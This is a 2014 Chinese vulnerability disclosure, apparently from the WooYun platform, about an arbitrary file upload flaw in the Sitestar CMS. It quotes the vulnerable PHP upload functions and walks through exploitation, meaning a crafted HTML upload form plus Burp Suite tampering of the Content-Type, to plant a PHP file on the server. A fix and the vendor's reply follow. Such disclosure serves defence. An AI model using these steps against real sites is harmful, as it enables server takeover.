漏洞详情

披露状态:

2014-01-14: 细节已通知厂商并且等待厂商处理中
2014-01-15: 厂商已经确认,细节仅向厂商公开
2014-01-18: 细节向第三方安全合作伙伴开放
2014-01-25: 细节向核心白帽子及相关领域专家公开
2014-02-04: 细节向普通白帽子公开
2014-02-24: 细节向实习白帽子公开
2014-04-14: 细节向公众公开

简要描述:

建站之星任意文件上传漏洞(续二)

详细说明:

#1 漏洞产生

/module/mod_media.php

flash_picker() 和 image_picker() 两个函数

image_picker() 函数

$typeArr = array('image/jpeg','image/pjpeg');
$flash_typeArr = array('image/jpeg','image/pjpeg');
$file_info =& ParamHolder::get('localfile', array(), PS_FILES);
$file_info['name'] = Toolkit::changeFileNameChineseToPinyin($file_info['name']);
if ( sizeof($file_info) > 0 && isset($file_info['name']) )
{
// 文件大小
if ( ($file_info['size'] == 0) || ($file_info['size'] > $maxsize) ) {
$err = __('Upload size limit').':2M';
// 文件类型
} elseif ( !in_array( $file_info['type'], $typeArr ) ) {
$err = __('Supported file format').':jpg';
}else {
$dest = ROOT.'/upload/image/';
//$file_info['name'] = Toolkit::randomStr(8).strrchr($file_info["name"],".");
if (preg_match("/^WIN/i", PHP_OS) && preg_match("/[\x80-\xff]./", $file_info['name'])) {
$file_info['name'] = iconv("UTF-8", "GBK//IGNORE", $file_info['name']);
}
if ( move_uploaded_file( $file_info['tmp_name'], $dest.$file_info['name'] ) ) {
ParamParser::fire_virus($dest.$file_info['name']);
$wincls = 'OK';
// 图片水印
if( WATERMARK_STATUS ) $this->img_restruck($file_info['name']);
$this->assign('fname', $file_info['name']);
} else { $err = __('Uploading file failed!'); }
}
}



flash_picker()函数

$typeArr = array('application/x-shockwave-flash','application/x-download');
$file_info =& ParamHolder::get('localfile', array(), PS_FILES);
if ( sizeof($file_info) > 0 && isset($file_info['name']) )
{
// 文件大小
if ( ($file_info['size'] == 0) || ($file_info['size'] > $maxsize) ) {
$err = '上传大小限制:2M';
// 文件类型
} elseif ( !in_array( $file_info['type'], $typeArr ) ) {
//$err = '支持的文件类型:swf|flv';
$err = '支持的文件类型:swf';
} else {
$dest = ROOT.'/upload/flash/';
$file_info['name'] = Toolkit::randomStr(8).strrchr($file_info["name"],".");
if ( move_uploaded_file( $file_info['tmp_name'], $dest.$file_info['name'] ) ) {
ParamParser::fire_virus($dest.$file_info['name']);
$wincls = 'OK';
$this->assign('fname', $file_info['name']);
} else { $err = '上传失败'; }
}
}



看见了吧 两个函数都只检查了Content-Type参数

你们难道不知道Content-Type参数可以被完全控制吗?

鉴于这两个文件上传比较简单 就不多说了...

漏洞证明:

#2 漏洞利用

将如下代码保存为upload.htm

<form enctype="multipart/form-data" method="post" action="http://www.vulns.org/sitestar/index.php?_m=mod_media&_a=flash_picker">
Flash:<input type="file" name="localfile"/>
<input id="Upload" type="submit" value="Upload">
</form>



访问upload.php并上传文件,上传的时候用Burpsuite 抓包 并修改

1.jpg



点击Forward即可在 /upload/flash 下面生成php文件

2.jpg

修复方案:

强烈建议采用统一的上传代码;

对文件进行安全检查时,千万别只检查文件上传的Content-Type参数,这个参数只要抓包就可以对其进行任意修改。

版权声明:转载请注明来源 felixk3y@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-01-15 09:01

厂商回复:

安全补丁包之前就已经发布,在管理后台可以直接升级修复.此漏洞在下载版中由于服务器环境不同而存在危险,建议使用我司建站之星下载版的用户在后台进行安全补丁的升级.

最新状态:

暂无


漏洞评价: